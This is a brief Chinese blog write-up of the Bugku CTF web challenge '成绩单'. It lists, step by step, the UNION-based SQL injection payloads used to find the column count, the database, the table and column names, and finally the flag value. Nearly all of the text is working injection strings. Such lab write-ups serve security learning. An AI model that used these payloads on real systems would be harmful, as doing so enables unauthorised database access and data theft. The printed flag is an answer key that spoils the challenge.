Bugku web 成绩单

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/S123KO/article/details/100048684

本题直接在页面中的查询栏输入:

1' order by 4# (求出列数4列)

1' and 1=2 union select 1,2,3,4# (求显示位)

1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag)

1'and 1=2 union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema='skctf_flag'# (求出表名为fl4g,sc)(注意这是两个表)

1'and 1=2 union select 1,2,3,group_concat(column_name)from information_schema.columns where table_schema='skctf_flag' and table_name = 'fl4g'# (求出列名为skctf_flag)

1'and 1=2 union select 1,2,3,group_concat(skctf_flag) from fl4g#  (求字段内容为BUGKU{Sql_INJECT0N_4813drd8hz4})(结束)

猜你喜欢

转载自blog.csdn.net/S123KO/article/details/100048684